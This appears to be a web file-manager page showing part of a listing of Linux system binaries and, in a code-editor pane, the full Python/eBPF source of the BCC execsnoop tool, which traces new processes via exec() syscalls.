KB
-rwxr-xr-x
vipw
60.69
KB
-rwxr-xr-x
virtiostat-bpfcc
8.69
KB
-rwxr-xr-x
visudo
252.71
KB
-rwxr-xr-x
vnstatd
93.28
KB
-rwxr-xr-x
vpddecode
14.58
KB
-rwxr-xr-x
vsftpd
156.48
KB
-rwxr-xr-x
wakeuptime-bpfcc
8.1
KB
-rwxr-xr-x
wipefs
38.38
KB
-rwxr-xr-x
writeback.bt
1.66
KB
-rwxr-xr-x
xfs_admin
2.12
KB
-rwxr-xr-x
xfs_bmap
695
B
-rwxr-xr-x
xfs_copy
90.44
KB
-rwxr-xr-x
xfs_db
688.56
KB
-rwxr-xr-x
xfs_estimate
14.16
KB
-rwxr-xr-x
xfs_freeze
800
B
-rwxr-xr-x
xfs_fsr
42.18
KB
-rwxr-xr-x
xfs_growfs
38.23
KB
-rwxr-xr-x
xfs_info
1.26
KB
-rwxr-xr-x
xfs_io
203.65
KB
-rwxr-xr-x
xfs_logprint
78.27
KB
-rwxr-xr-x
xfs_mdrestore
34.23
KB
-rwxr-xr-x
xfs_metadump
816
B
-rwxr-xr-x
xfs_mkfile
1.02
KB
-rwxr-xr-x
xfs_ncheck
685
B
-rwxr-xr-x
xfs_quota
90.16
KB
-rwxr-xr-x
xfs_repair
643.32
KB
-rwxr-xr-x
xfs_rtcp
18.15
KB
-rwxr-xr-x
xfs_scrub
106.27
KB
-rwxr-xr-x
xfs_scrub_all
7.66
KB
-rwxr-xr-x
xfs_spaceman
42.3
KB
-rwxr-xr-x
xfsdist-bpfcc
4.61
KB
-rwxr-xr-x
xfsdist.bt
972
B
-rwxr-xr-x
xfsslower-bpfcc
7.78
KB
-rwxr-xr-x
xtables-legacy-multi
92.95
KB
-rwxr-xr-x
xtables-monitor
219.16
KB
-rwxr-xr-x
xtables-nft-multi
219.16
KB
-rwxr-xr-x
zerofree
14.15
KB
-rwxr-xr-x
zfsdist-bpfcc
5.3
KB
-rwxr-xr-x
zfsslower-bpfcc
8.45
KB
-rwxr-xr-x
zic
66.39
KB
-rwxr-xr-x
zramctl
54.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : execsnoop-bpfcc
#! /usr/bin/python3 # @lint-avoid-python-3-compatibility-imports # # execsnoop Trace new processes via exec() syscalls. # For Linux, uses BCC, eBPF. Embedded C. # # USAGE: execsnoop [-h] [-T] [-t] [-x] [--cgroupmap CGROUPMAP] # [--mntnsmap MNTNSMAP] [-u USER] [-q] [-n NAME] [-l LINE] # [-U] [--max-args MAX_ARGS] [-P PPID] # # This currently will print up to a maximum of 19 arguments, plus the process # name, so 20 fields in total (MAXARG). # # This won't catch all new processes: an application may fork() but not exec(). # # Copyright 2016 Netflix, Inc. # Licensed under the Apache License, Version 2.0 (the "License") # # 07-Feb-2016 Brendan Gregg Created this. # 11-Aug-2022 Rocky Xing Added PPID filter support. from __future__ import print_function from bcc import BPF from bcc.containers import filter_by_containers from bcc.utils import ArgString, printb import argparse import re import time import pwd from collections import defaultdict from time import strftime def parse_uid(user): try: result = int(user) except ValueError: try: user_info = pwd.getpwnam(user) except KeyError: raise argparse.ArgumentTypeError( "{0!r} is not valid UID or user entry".format(user)) else: return user_info.pw_uid else: # Maybe validate if UID < 0 ? return result # arguments examples = """examples: ./execsnoop # trace all exec() syscalls ./execsnoop -x # include failed exec()s ./execsnoop -T # include time (HH:MM:SS) ./execsnoop -P 181 # only trace new processes whose parent PID is 181 ./execsnoop -U # include UID ./execsnoop -u 1000 # only trace UID 1000 ./execsnoop -u user # get user UID and trace only them ./execsnoop -t # include timestamps ./execsnoop -q # add "quotemarks" around arguments ./execsnoop -n main # only print command lines containing "main" ./execsnoop -l tpkg # only print command where arguments contains "tpkg" ./execsnoop --cgroupmap mappath # only trace cgroups in this BPF map ./execsnoop --mntnsmap mappath # only trace mount namespaces in the map """ parser = argparse.ArgumentParser( description="Trace exec() syscalls", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=examples) parser.add_argument("-T", "--time", action="store_true", help="include time column on output (HH:MM:SS)") parser.add_argument("-t", "--timestamp", action="store_true", help="include timestamp on output") parser.add_argument("-x", "--fails", action="store_true", help="include failed exec()s") parser.add_argument("--cgroupmap", help="trace cgroups in this BPF map only") parser.add_argument("--mntnsmap", help="trace mount namespaces in this BPF map only") parser.add_argument("-u", "--uid", type=parse_uid, metavar='USER', help="trace this UID only") parser.add_argument("-q", "--quote", action="store_true", help="Add quotemarks (\") around arguments." ) parser.add_argument("-n", "--name", type=ArgString, help="only print commands matching this name (regex), any arg") parser.add_argument("-l", "--line", type=ArgString, help="only print commands where arg contains this line (regex)") parser.add_argument("-U", "--print-uid", action="store_true", help="print UID column") parser.add_argument("--max-args", default="20", help="maximum number of arguments parsed and displayed, defaults to 20") parser.add_argument("-P", "--ppid", help="trace this parent PID only") parser.add_argument("--ebpf", action="store_true", help=argparse.SUPPRESS) args = parser.parse_args() # define BPF program bpf_text = """ #include <uapi/linux/ptrace.h> #include <linux/sched.h> #include <linux/fs.h> #define ARGSIZE 128 enum event_type { EVENT_ARG, EVENT_RET, }; struct data_t { u32 pid; // PID as in the userspace term (i.e. task->tgid in kernel) u32 ppid; // Parent PID as in the userspace term (i.e task->real_parent->tgid in kernel) u32 uid; char comm[TASK_COMM_LEN]; enum event_type type; char argv[ARGSIZE]; int retval; }; BPF_PERF_OUTPUT(events); static int __submit_arg(struct pt_regs *ctx, void *ptr, struct data_t *data) { bpf_probe_read_user(data->argv, sizeof(data->argv), ptr); events.perf_submit(ctx, data, sizeof(struct data_t)); return 1; } static int submit_arg(struct pt_regs *ctx, void *ptr, struct data_t *data) { const char *argp = NULL; bpf_probe_read_user(&argp, sizeof(argp), ptr); if (argp) { return __submit_arg(ctx, (void *)(argp), data); } return 0; } int syscall__execve(struct pt_regs *ctx, const char __user *filename, const char __user *const __user *__argv, const char __user *const __user *__envp) { u32 uid = bpf_get_current_uid_gid() & 0xffffffff; UID_FILTER if (container_should_be_filtered()) { return 0; } // create data here and pass to submit_arg to save stack space (#555) struct data_t data = {}; struct task_struct *task; data.pid = bpf_get_current_pid_tgid() >> 32; task = (struct task_struct *)bpf_get_current_task(); // Some kernels, like Ubuntu 4.13.0-generic, return 0 // as the real_parent->tgid. // We use the get_ppid function as a fallback in those cases. (#1883) data.ppid = task->real_parent->tgid; PPID_FILTER bpf_get_current_comm(&data.comm, sizeof(data.comm)); data.type = EVENT_ARG; __submit_arg(ctx, (void *)filename, &data); // skip first arg, as we submitted filename #pragma unroll for (int i = 1; i < MAXARG; i++) { if (submit_arg(ctx, (void *)&__argv[i], &data) == 0) goto out; } // handle truncated argument list char ellipsis[] = "..."; __submit_arg(ctx, (void *)ellipsis, &data); out: return 0; } int do_ret_sys_execve(struct pt_regs *ctx) { if (container_should_be_filtered()) { return 0; } struct data_t data = {}; struct task_struct *task; u32 uid = bpf_get_current_uid_gid() & 0xffffffff; UID_FILTER data.pid = bpf_get_current_pid_tgid() >> 32; data.uid = uid; task = (struct task_struct *)bpf_get_current_task(); // Some kernels, like Ubuntu 4.13.0-generic, return 0 // as the real_parent->tgid. // We use the get_ppid function as a fallback in those cases. (#1883) data.ppid = task->real_parent->tgid; PPID_FILTER bpf_get_current_comm(&data.comm, sizeof(data.comm)); data.type = EVENT_RET; data.retval = PT_REGS_RC(ctx); events.perf_submit(ctx, &data, sizeof(data)); return 0; } """ bpf_text = bpf_text.replace("MAXARG", args.max_args) if args.uid: bpf_text = bpf_text.replace('UID_FILTER', 'if (uid != %s) { return 0; }' % args.uid) else: bpf_text = bpf_text.replace('UID_FILTER', '') if args.ppid: bpf_text = bpf_text.replace('PPID_FILTER', 'if (data.ppid != %s) { return 0; }' % args.ppid) else: bpf_text = bpf_text.replace('PPID_FILTER', '') bpf_text = filter_by_containers(args) + bpf_text if args.ebpf: print(bpf_text) exit() # initialize BPF b = BPF(text=bpf_text) execve_fnname = b.get_syscall_fnname("execve") b.attach_kprobe(event=execve_fnname, fn_name="syscall__execve") b.attach_kretprobe(event=execve_fnname, fn_name="do_ret_sys_execve") # header if args.time: print("%-9s" % ("TIME"), end="") if args.timestamp: print("%-8s" % ("TIME(s)"), end="") if args.print_uid: print("%-6s" % ("UID"), end="") print("%-16s %-7s %-7s %3s %s" % ("PCOMM", "PID", "PPID", "RET", "ARGS")) class EventType(object): EVENT_ARG = 0 EVENT_RET = 1 start_ts = time.time() argv = defaultdict(list) # This is best-effort PPID matching. Short-lived processes may exit # before we get a chance to read the PPID. # This is a fallback for when fetching the PPID from task->real_parent->tgip # returns 0, which happens in some kernel versions. def get_ppid(pid): try: with open("/proc/%d/status" % pid) as status: for line in status: if line.startswith("PPid:"): return int(line.split()[1]) except IOError: pass return 0 # process event def print_event(cpu, data, size): event = b["events"].event(data) skip = False if event.type == EventType.EVENT_ARG: argv[event.pid].append(event.argv) elif event.type == EventType.EVENT_RET: if event.retval != 0 and not args.fails: skip = True if args.name and not re.search(bytes(args.name), event.comm): skip = True if args.line and not re.search(bytes(args.line), b' '.join(argv[event.pid])): skip = True if args.quote: argv[event.pid] = [ b"\"" + arg.replace(b"\"", b"\\\"") + b"\"" for arg in argv[event.pid] ] if not skip: if args.time: printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="") if args.timestamp: printb(b"%-8.3f" % (time.time() - start_ts), nl="") if args.print_uid: printb(b"%-6d" % event.uid, nl="") ppid = event.ppid if event.ppid > 0 else get_ppid(event.pid) ppid = b"%d" % ppid if ppid > 0 else b"?" argv_text = b' '.join(argv[event.pid]).replace(b'\n', b'\\n') printb(b"%-16s %-7d %-7s %3d %s" % (event.comm, event.pid, ppid, event.retval, argv_text)) try: del(argv[event.pid]) except Exception: pass # loop with callback to print_event b["events"].open_perf_buffer(print_event) while 1: try: b.perf_buffer_poll() except KeyboardInterrupt: exit()
Close
